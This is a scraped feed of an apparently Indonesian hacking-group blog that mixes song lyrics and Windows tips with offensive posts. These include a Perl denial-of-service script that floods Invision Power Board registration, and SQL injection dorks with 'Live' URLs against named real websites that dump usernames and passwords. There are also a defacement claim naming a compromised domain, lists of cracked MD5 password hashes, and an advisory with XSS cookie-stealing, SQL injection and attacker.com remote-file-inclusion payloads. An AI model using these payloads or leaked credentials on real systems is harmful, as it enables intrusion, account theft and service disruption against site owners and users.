-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-


# milw0rm.com [2009-04-22]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs

Dream Theater -The Spirit Carries On

Music by Dream Theater
Lyrics by John Petrucci

Nicholas:
Where did we come from,
Why all here?
Where do we go when we die?
What lies beyond
And what lay before?
Is anything certain in life?

They say, "Life is too short,"
"The here and the now"
And "You're only given one shot"
But could there be more,
Have I lived before,
Or could this be all that we've got?

If I die tomorrow
I'd be all right
Because I believe
That after we're gone
The spirit carries on

I used to be frightened of dying
I used to think death was the end
But that was before
I'm not scared anymore
I know that my soul will transcend

I may never find all the answers
I may never understand why
I may never prove
What I know to be true
But I know that I still have to try

If I die tomorrow
I'd be all right
Because I believe
That after we're gone
The spirit carries on

Victoria:
"Move on, be brave
Don't weep at my grave
Because I am no longer here
But please never let
Your memory of me disappear"

Nicholas:
Safe in the light that surrounds me
Free of the fear and the pain
My questioning mind
Has helped me to find
The meaning in my life again
Victoria's real
I finally feel
At peace with the girl in my dreams
And now that I'm here
It's perfectly clear
I found out what all of this means

If I die tomorrow
I'd be all right
Because I believe
That after we're gone
The spirit carries on



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Lyrics

Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = ;
chop ($serv);
print "Forum Path: ";
$path = ;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]

Fear Nothing. Risk Everything.

WWW.INDONESIANCODER.COM

Read more »

Posted in: Hacking

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Prevent DNS problems with this tip for Windows XP

When you visit a website, Windows XP tries to speed things up by placing the DNS information about that site, into a DNS cache on your PC.

This is OK until there are problems with the network, DNS server or even the website!

You see the DNS Windows XP cache stores BOTH negative and positive entries. The positive entries are those that the DNS lookup was successful and you could connect to the website.

Negative entries are those where the DNS lookup failed and you could not connect to the website.

A problem can arise here because if the DNS cache hold a negative entry and the website you want to view is now OK to view, Windows XP will still give you a DNS error!

By default these negative entries are cached for 5 mins. But we can tweak the registry to NOT store negative entries at all!

There is ALSO another potential pitfall with the Windows XP DNS cache...

Most ISP's and Domain name registrar's now update their DNS information (TTL) every 4 hours instead of the twice daily updates that were common few years ago.

This means that your DNS Windows XP cache may be out of date for certain entries!

So lets look at how we can tweak the registry to prevent these problems occurring:

Flush DNS

First of all it would be a good idea to flush the local DNS cache so we are starting with a clean sheet!

To do this simply enter: ipconfig /flushdns in a command prompt. You will then get the following window appear confirming the flush,



Successful DNS Flush

Now we have a clean DNS cache lets make the changes to the registry.


Block Negative Entries

To force Windows XP NOT to cache negative entries we need to add a new DWORD to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters

DWORD: MaxNegativeCacheTtl

Value: 0

This will now ensure NO negative entries are stored.


Cache TTL

To force Windows XP to keep positive entries in DNS Cache for only 4 hours instead of the default 24 hours we need to apply the following change to the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters

DWORD: MaxCacheTtl

Value: 14400

NB - make sure you enter the 14400 (seconds) as Decimal Base and NOT Hexadecimal Base!

Now your registry key should look similar to this







VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Tips and Trick,Tutorial

"This operation has been cancelled due to restrictions in effect on this computer."

A very common question in the Microsoft public newsgroups goes something like this:

When clicking on a hyperlink in an e-mail, I get this Message : "This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator." I get this message every time that I attempt to use the hyperlink. I am the administrator on this stand alone computer. How do I deactivate this feature so that I activate hyperlinks ?

This is not an Outlook error. The most common cause is a corrupt registry key in Internet Explorer 6. The registry key found at

HKEY_Local_Machine\Software\Classes\htmlfile\shell\open\command

is either damaged or corrupt.

To fix it, try resetting Web settings in Internet Explorer. If this does not resolve the issue, you'll need to import the registry key from another computer.

Reset Web Settings

To Reset Web settings

1. Open Internet Explorer.
2. On the Tools menu, click Internet Options.
3. Click the Programs tab, and then click the Reset Web Settings button.
4. Under Internet programs, verify that the correct e-mail program is selected.
5. Click to select the Internet Explorer should check to see whether it is the default browser check box.
6. Click Apply, and then click OK.

If you receive a message when Internet Explorer starts telling you that IE is not currently your default browser, click Yes to make it your default.

Import the Registry Key

When resetting the web settings doesn't help, you'll need to recreate the corrupt key. The easiest way to do this is by exporting the key from another computer.

To save exporting it from another computer, right click here to download a registry key exported from my computer. Choose Save target as and change the file extension from txt to reg and double click on it to run it.

If you prefer to use a key from a computer you have access to, follow the instructions in You receive an error message when you click a hyperlink in Outlook.

Set Program Access in Control Panel

Windows XP and Vista allow you to control program defaults through Control Panel, Add and Remove Programs, Set Program Access and Defaults. If the above methods fail, use this method to set the default browser.

Other Causes

There are several other causes of this error. In most cases, they do not affect hyperlinks in Outlook. If you found this page searching for the error message, check out the following pages. Note that if you receive this error on a computer at work, you should contact your administrator, they may want access to applications restricted for security reasons.

You receive the message when:
# Using Outlook 2002 SP3
# Trying to run a program
# Saving a document (Windows 2000)
# Accessing file open dialog
# Starting Windows Explorer

Search Microsoft (using Google) for additional articles

More Information

You receive an error message when you click a hyperlink in Outlook


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Tips and Trick,Tutorial

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

Make a PHP info file

This tutorial will show you how to display Apache PHP configuration.
It is useful in cases when you are going to install a particular application which needs specific requirements like register_globals or long_array turned On or Off.

This can be done by simply uploading one file, for example 'info.php' with the following code included inside:

// Print all information.
phpinfo();

// Output only the module information.
phpinfo(INFO_MODULES);

?>

create one text file with your favorite text editor like Notepad, then copy and paste the code above into it. Save the file for example like info.php and then upload it to your server.
Then you are ready type : http://yourdomain.tld/info.php and you should see a table with the current PHP configuration and module information.




VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Hacking,Tutorial

SSH Explorer SSH Client

SSH Explorer is a new generation SSH/Telnet client and terminal emulator that makes remote Linux server administration look like much more fun than it actually is.
File View panel lets you navigate through and operate with remote directories and files as effortlessly as if they were on your home computer.

The integrated text editor will be a great tool for people who don't like the awkward vi and emacs interface.

SSH Explorer also includes a pack of useful Linux commands and allows you to create your own snippets so you don't have to remember and type them anymore. VT100 terminal emulation, SSH1, SSH2 and Telnet protocols are supported.

PCWIN[dot]COM

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Hacking,Tutorial

Hash Cracked

trapped eeb3fe2603459c1a2d36f274c9884de8
traubel 6ce6d95a6f50c6e0c5b211f3a88cdcae
travaioli 161bfaed94828a469836e37c053c5b24
travelling 5d55d8fa18da1ff5fd6b8aa699921ad8
travolta 35e21c3db1acbf900e8c92fbfa761c41
treacle 12873f83e7d37c554c9b1503b8625609
treatment 6292fea48cc177b8bde77da7be2e3c51
trees 2d5563ed288ac5396add9b78fbca810b
tresvant b9432c5dc3e35bcca1eece71c19235c7
trevor d801a0b4701f64a0eae5f71f44f8d83f
tribbles ca81601b0e6a2b249360ccfdd1cc71f8
trinere 55aeb060862bcaadb34c10be51fe35c2
tristar d65740220804de8da9843cb6cba68efa
tritt 58f61214090e9a055cd618cfb586b91d
trixter aa410c9111c7db8736d0c55f5847b3ee
trois df809177146786d164f1fdd500fa1b1e
trotsky cb4f3f03aab72fbdc6ead03fda325c15
trovaioli 9fc04884864e2e9cc3dc38f38f9b2066
truffaut 04eb51fd68c6eac1536fbd1a6160ea62
trusting be7bfa28cbb984263b76c454d54305eb
tuned b40b43fd5af2db4fbfeb4e83856e4876
turner 0f16cff442c47bbbf3b4715d7b39b3d2
tutti 8e080e1834aac678524b05313d4d8b9c
tutto 35a9b9c553129a2e647c70aae2088f61
twillie feff973491b28b2048e7e640f1dde939
twins 9275efa86a9ca523106d0238bbf8c0b2
tyne e071d9913efbe3c0e310ca435d4a7a58
types d14a8022b085f9ef19d479cbdd581127
uggams c8a866253bffeddfa4101f540d014965
uhuru c91497eaedfc46b7398ef737efc428e0
ultime 3fff9a8c636adb0115d963edd3aaae72
unbearable e4c3c9ec0e1ae26d9191d3dd2ab6734e
undiscovered f591da344a74f7eb0d9514e7430866ab
unforgiven d35e82c0b219c5a8517327a74d1f1396
ungar f6b6f0f0b6312f45a89f41fcedab1a95
unlawful e72a3910d952b9d75a9c011422169b0f
unoriginal 7f31f6da784692dfbf911ebb44321749
unsinkable d3f06208c89fddfeab92e900e626f8ed
untamed 0569d7d8557e26ca0c34abd6f1cb7009
untouchables 072bb4c3c210cd4312dd0209423ded51
uomini 9e8219d782343560e217b6a78b1820aa
uomo 774e9d4f7300a5a6fa2ce0447d28f27e
used 1aec9c5d0644e11fd9dd0f9fb36009fb
usuelli 1ae6a20f8f1b18903034b9a0ac08524b
valdimir c2ee9c13575ed78c7be8d05bbffc720b
valigia 214f3c53f0a508056e5c1c9123365e37
vallee c735e0e3a2f48d1c7593c578ed5a0206
valli 2e7fd5477682b0b54a1f060ba6b8eb70
valmouth baac99a0cdc4981d01a533cd068df017
values f09cc7ee3a9a93273f4b80601cafb00c
vandross 505bd95bb1e4702857af99a375e5573c
vangelis 2c4008bd20918d21be2a1d50ed2166af
vanzetti a8b2ff7cd5ab40a30ae8f912d5e753b9
varese e8f06abe0d9455ee445136d412f96483
variations 2598fe3ec117781a941e0e8ff655eaec
vario b691219af6d600c6b44be521bc72d0f7
variou 502b553be457c06dd9a912ccd3cef3f3
varney 307fb3283528d11b186b1dbbea100b2e
varujan 0bc6499fc7ee0c41bebef5be85606f76
vegas 0344adb607cb541118488284682da4dd
venduta 1a85b68665065e9a97533c9f44974fda
venere 61a24a2124e9bd75413404ea799ea316
venezia b0c399e7c5ef981bbca9a0b1f72b4139
ventura 43f6892b19a725cbb5c4048f88337c79
ventures 50947d0695f21832a1eda55a6318251d
verdon 7f91588846acc471f75f7774debc4b0a
vesta 285c65aae106302ffba3ce3a21dab3f1
vestoff d27eb3b966bda8fecc7773dd9a73b11c
vinny a04a649bd1ed7dc151a9dcf7ed2f8640
vino 69bb23ca275704f46c65d8ed4ac3b5d7
vinx 4e84d2a0d5d19bcc7c48c095d014f5f3
violenta 5f8530b87d69c5f1df11c6384fa2c4ee
vive 89cb77e3a49bde605a37afcd87508e16
vivi c3bb6f719742fd1e5768d6d1361cfb49
vizietto 3373a884abaf8104ea4bcc3e22add7c0
wagon 1dd908fb0ecaaee7cd33e3595dece640
wagons ff97c19d76ea81bb4f2a97f2ff0025e7
wailing 25fbaeeefc437dc6816eab4c6298b423
waits 303198d0056167e46a02445187efea69
wakeling e74709a24a825893485e6261f021834a
walker 1c3a0b25c3d1c909e2bcb9fe44c2f904
wanderers 5ac1eedb8dd70f7fbc91a3f2d3a04171
warlock 3398cb46ef96da5aad6ff70e60b98787
warner 1660885848050e9ca9746ddd54e2de25
wars ffa1e23980ca360c15665263d1e2d496
watley c5a4456d0c5fff98c1ae7b4afeb57ec0
waxman 1b61b42a9275e0fe5daa2d87abc257b1
weaver 758058d8987e7a9ec723bcdbec6c407e
webber 1c4ee6717f6f67e34d894202d1adbf9e
wedding 9e8e7343578f1819f85e1d9f7136cc40
weddings bf760eeb4cab0e970c836dc84130e037
weede 1ee11cf2a3fff4e615e16e289f5bb1ae
wellville 907b7353e51b56e596dfcded3e4fdf57
westerberg 52f469542833884851b3a9d09747d053
wheeler d44aba297c0d3aa4ff9e0ba79ddc58fa
whitley 36cedea35d6de52bf53a183b1a6d4646
whitmore 651b927e050cad877fec614240bf898d
whorehouse d522249349e87eeea0d3023c18366ea0
wido 02f78662729346070c200506ff61c823
willets 7a73fb78452f282d0a5acaa0f30fda60
willson 4c0ff93ef77c4c0d9cc288cba2a33ee5
willy e7236697824fb37763235980f1061218
winans 48ca47405b690b9a67b9375300f77818
windham 173d31292c7c22791048cc937e0fe08f
winds d00a2fec9aa4fb0ac7ed4a5073a41808
wings aa9f3975e1ac31d104905da5d2fa2d79
wiseman 84532a864b1a5f003528edf05edf5351
wishes b5cd1f00c6791b77e358231afd1ec35d
womack a1ce5768fdfc4b446aa9b5d30e20dbac
working c327b49efdca2668f28cd7b4beee54b3
worl 5b8d26dbbe6972efb423a5542b999fb4
wrestling f1800eb9b742b093359106546b9451a0
wynette 096b683ad233f7ecf4cdabed9dc5528f
wynton ec21de9c12daacfc240b3a4c2da918cc
xanadu 32373ca0a2699cec4bd97d912d2fede9
xmas bc55cdd78e059b9c0935dfdda17a280a
yamashirogumi 2c12781971bfdd63ec4699b00fb0211f
yankees 1d10ca7f8fe2615bf72a249a7d34d6b9
yankovic b2a3c981931278abeb20218ecdbe4020
yanni 809d190e8188a09526157a2b2458772f
yared 663db1e5f62ad66b58b9ad9aa78df356
years 75aeb98e5241592ad6a6c2c4c78a16ef
yearwood 709a704ed18d5dd7643c848a37419a53
yello c61dd29d8ca0b9811053d909ce7b0c6f
yentl 3165a45c0e42267e90ccb109f1ec7d92
yoakam 8e6096621f0da1a87bf0f6312e391598
youn 6c58135fca90040d292397afbab79e9f
youngbloods 25f77c730a0125d72453d553be951ebb
younger 0c7b95ee2d008a30f4589f3dc94ca6a1
youngsta b0e01113afcd8e773e24a55ca0a5de88
yours 2efe0008f59e6e614481f361c6f0fdb9
zabriskie 8704c639d7c93e16df8a05e11d1aefd2
zbigniew b80526194670e0b7fca68d79fe321ecf
zebrahead b00114f9fc38b48cc42a4972d7e07df6
zhao 77e6789426d131e4d862ecac4c7d0c5d
zhivago 22952237ab5954db7a4e7fc759372479
ziegfeld 0ca9e6f4295b9b83bfc4158afd897d9a
zimmer 43fcdd1901bd35328446756f83d85b28
zinman 432a1eda6a380831a08d41b89b9568dd
zinzi cbb53a168f36982a59fcb25f7a806ab9
zombies 9f63025bccd84c9dff056bf5d28100d8
zorba 0d57401765fabb1c1d5f207058908929
zorro 37a70993bae2f555da461ba7ea614eb2
zucchero 374362d9d73727148c366856d40e0146
zulu 7ab2493176d187c505a837d3c5cf8af5
zydeco 54e6d87eee0f5cb46168de8e490dc3e0



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: md5

Cracked Hash

81495c027241d3dc309428852164a68a tarahpol
2ecee85a2d8dff0ab3a7f9d7e1e4bda4 3006914
43440b9290eabcddaa3b1a3c3efdeb4b zxeroyx
06bb51580bad9dbdf7c51139b4324d10 2486959248
259e3936ceb623ada5b48beb971d688c cerverin
56289ed91281add402962da119fd5669 1968pp
82373355a71e04ad91760915e2e24139 75764948
580ef0836e519062e169d3259d344d30 427677123
15953ba1215bbe6b562b879afd202f23 601060
0e88336b8bca30c07d266b2e62d49dfa 26601980
0deedc996a94044b40f1be880d5cf506 629096250
951d01b8a2c632024c10a7ae1730b7f9 1721963
ee943db8f4ec8a64027718931f6829cc 1421735199
39cf85ab5e81be3a1e8cd2f91d945ad2 jrtobon
a4a34395c98c8a4594887fcff711d2de 040602
9c7f8f83fd3141719b51128c7dc286c5 martin1628
56706c48641d5e774191a00662041c93 king4ever
db36fdf51910d4cfa71a74f45f9211a1 elchefo
3f2d2585a9729491cb88289e7715e458 dkcimpe
19f297e263be5bd119f8ee8fdab8a36d di1178
500b486a1b9b103e9dfa92e4c3a3b70b 627566116
8f206aa322f16a3b45347facabfdcdb2 komunidad
a88cef71b66970d435883b3c53b2bb68 cholid
f2855f1e4c6b77ace54b6a6ef90ca100 luigar
c8fa4f581de7a72be5fdc156d728f6a4 202550620
f0af32b91b2df602b0690c97ad94bfc3 clancanu
b0ddeb412cc340d0f1eb9c47ad99f2c4 pwotftw
b81cfdb31df5021ed8af6c94ce1ed779 trusux



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: md5

Malingsial Site pwned

Domain: http://tukulesto.gtfsabah.com/
Mirror: http://www.evilc0der.com/mirror/7050/
uname -a: Linux netserv.netkl.org
uid=99(nobody) gid=99(nobody) groups=99(nobody)



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Defacing

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia
Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms,etc.
Finally it can lead to admin account compromise and ovetakeing of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploitining in this way.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtakeing...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs,Hacking

md5 hash result

HASH          RESULT
f68d6257f3283c29a2ac0939ac45b46c tr1lat3ral
b7d25e14395822461c97d9c9708d5cfb dc6W1hp
92794b20b92309b2e1ca335e4f95783e 6anina96
38461e5b1f0ab939ddc0b5951f356e33 c8ommega
7547db6e86d2a55fe0ab85985e367c33 ddsusanne
e865001d2e32ed9190a7bbf0c58b8678 2bUfciu
244ea1588f1d141bfef687fbdb331b6e id0173
9d36d5aaa414cbb9ecbe561f959658b6 922798
15dfff3348f289ea0e73f5ddd4a0f7a4 rex9869
12a4e59f670a12aa15ac3a8120efb1a3 us2rj6
3914591c9add5435d26f8d4750f5c108 itvbxy
cc19c8b8b6c36bac097274b15fa32efe oloxolox
8332047cb4ceb1646c17f33a868a2912 1zorec3
30266e69e9d2cc380c6c98391055f4f1 28.3.1975
1bee9d8781669c55144e989f8640a4c9 16.7.1975
b0acddac857b0971e0e414c50126c4c7 25.3.1965
4956c1b0cd069d16d3e53132bf89fc50 20.4.1989
43215c787d1360e929a8f4fa71f0262a 26.5.1969
ab2b6064596287b38e414993c40adb8e 2.7.1998
67b2ec5ae4a6fcbba6ad4aa3d0fe6b38 14.5.1979
e183cd80ffa8985d6ea90951c07ed89f 31.2.2007
20aa3c8217acdb0f7392d15017005703 31.8.1996
ee6fc195c819ddabacacb1cb270565dd 1.10.1996
790815a513fc928d8f122f6759ad2471 8.8.1976
a86a800fedcce2797efe5ab312b11da0 4fAlfred
f2677dc73de10f9e829404811b606b3e 7.8.1997
756c063bad497e5ebbc27358dcc22368 31.3.2000
b0846765a7547f951751551beb425f81 9.1.1997
398d16ebe8f7c85ae10b9f13f591f117 20.1.1971
3b9074c5d4764e2f9e99873dff41190b 21.6.1962
a727504b5780251b4ac559ee43d71d60 10.12.1987
dae803fc51619d543ac665172d95e99a 4.11.1981
cd565fe4525b6ec0c975fe817b2e7a49 17.2.1993
59cf2689c66f57a1e333a01f249940f0 30.2.1989
da5ed6ab373acb09d069c08fe3a903f3 10.9.1979
66b0c732b717706989a0c295f3c82d94 17.8.1990

67a589e29e4a60739b00297d78a7d3b5 5.4.1999
9fa2da1c619f64282c79c274f9321961 27.1.1962
7e7a975ba91734e00aede4927aacab33 19.10.1970
9ea13a4518d7d84b658b1f5762ef0219 5.11.1964
b160bd149cafa2947a29f4af5de15e6c 29.1.1979
4a641765e29597d4e966d9b124f0aa81 11.11.1982
c83a40f2ab4f886a2833eb6e3769e5a9 16.7.1989
3b93a29543674dcfe2850f4b53f73740 31.9.1996
d61f5249cf5d524ea639d67c1930b77a 13.4.1987
445f860497276ea9acadd4ada1e68b4a 13.3.1974
ef006c2690e99e3a18295b918519cde5 13.5.1963
98d4cbb1fc44a709eaa2255e03dd8504 30.1.1981
c3987a6cac0da267fa89e876cd4085fc 14.1.1997
22b3a25f13f3270bd9e419412b537b8f 31.11.1960
99e459f4a5e73766c09ac24edefefaa8 31.4.1997
51a8c24da181b92a01dca6463fb67a0b 8.6.1993
e7f4bce621b39ad224f73c0069345605 9.11.1965
27cfd5d2257efb5f2ff5e3f920977179 7.3.1971
f23434be08d89eac9fe55e0031cb700a 27.3.1980
39ea926727607cc4bc3799f2532a88f9 6.9.1994
a7825a2ce6400b7e0bd6f89a7bbbb75a 9309111979
87c08a8c6e89d2c53d79e0bda5845c53 9.6.1969
9576de8b41e56ca29dd98eb3a768db04 4.10.1979
ab1148d68917b63edc13d18d9f6507a7 12.8.1965
47a0f4f11c0f11ef5b67dac4274a358c 12.7.1977
a3fed49d4891d6eedb1b606076ba3c02 18.1.1969
b21596c54e76fae81f212b0264e2dc80 28.4.1970
ac0746237ce2bfefdaa03f2b97bfecca 8.5.1967
66ef0fc1f7bfa11f7b1e69204182096c 16.4.1968
dc00c693265599622c6ea296cf37255f 1.2.1981
6b9a4cca7ff84b05a5506312f5c7887c 22.1.1974
76ece562eb760b95a968d9d5c463d7b0 16.8.1971
4e28168261b1890625bc86c9582bd62a 20.3.1994
940453ba77f85b5a6994f09d5c9471bf 14.5.1968
d01d80ae31a20d8274c51dfc92f2e2d4 19.11.1960
d7169ac45c16186e64146e2294c88dc4 4.5.1964
b4d4017c1e9b36468fc8be5542308143 6.8.1973
0cd0cb0206016b70e1cc9a42457df98c 18.9.1977
1202eff4c17f78c62350111aa4c1708a 24.1.1993
cb730d1ba27048f61baba069e09185a7 1.5.1998
0cb8e7261a455dd11058ac3d6222e84f 10.4.1974
8ac35668b0d9c684d3ec65a3ea80cfb8 20.3.1975
04087800e68f180e7fe3c061f63276d9 3.8.1986
f85d65551afc2b9c2f82d78277fd8949 3.3.1966
72ca91f6b5ef3d4dc834f09dd84e1c02 29.12.1964
61652ec897816a652e9c7b9eb1c5a190 7.6.1991
ac5c7d4c516af8bac32e1e4890825b8e 16.1.1971
f0196b5527141dd363588f3e6c398ede 28.3.1974
1700fbccb0d05127c56d10b6777a42a4 31.6.1996
4b315e1a66d7720a986ade950a2bd95e 8etreppe
b9d339c439317b33a46caf5662dabfd9 c5biberle
e366de0e4023b753e8a138b4d83ecaf3 29618541
72ae77fd94da32b8ff7c00a2beac942f tasso712
8479c86348afb645a141b3e437848365 tardmonkey
861e86fea1390ff87ed8cb1952a0753d kdkqm5
9d36d5aaa414cbb9ecbe561f959658b6 922798
1e9a309b18baeee7a85d58d21a3192c4 752477


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Hacking,md5

Reel Big Fish - Where Have You Been?

You called me up last night in tears and said you missed me after all these years
But Ive been waiting here so long, Ive gotten over it since youve been gone
You called me up last night again and said youre finished with your new boyfriend
Asked if you could come back home- so sorry that you left me all alone

